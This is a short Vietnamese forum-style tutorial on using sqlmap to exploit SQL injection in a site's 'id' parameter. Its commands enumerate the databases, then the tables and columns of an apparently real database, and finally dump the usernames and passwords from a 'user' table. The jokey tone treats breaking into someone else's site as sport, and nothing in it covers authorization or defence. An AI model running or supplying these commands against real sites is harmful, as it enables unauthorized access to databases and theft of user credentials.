VD: ta có 1 site như này http://www.xxxxxxxx.com/about.php?id=1
Giờ khởi động SQL bằng cách đánh lệnh (-h hoặc --help) vào cửa sổ console
Mã:
# sqlmap --help
Để xem được database ta dùng lệnh sau
Mã:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 --dbs-u = đường dẫn url
--dbs = Liệt kê databases
Theo cái hình chình ình ở trên thì chúng ta thấy được " unecuae_unec " cái này là cái gì thì tôi ko cần nói nữa há
Giờ chúng ta tiếp tục với lệnh :
Mã:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec --tables-D = DBMS liệt kê dữ liệu
--tables = liệt kê cái gì thì các bạn tự tìm hiểu hén.....
Sau khi tìm thấy 1 số " bảng tuần hoàn hóa học " chúng ta tiếp tục dụng lệnh để show hàng ra
Mã:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user --columns-T = DBMS lệnh lệt kê dữ liệu
--columns = liệt kê cái gì thì các bạn tự tìm hiểu hén.....
Đến đây là bạn đã có thể soi được quần chíp của bợn admin rầu đó
Mã:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user -C user_username,user_password --dump
Câu chuyện của tôi đến đây là hết rồi....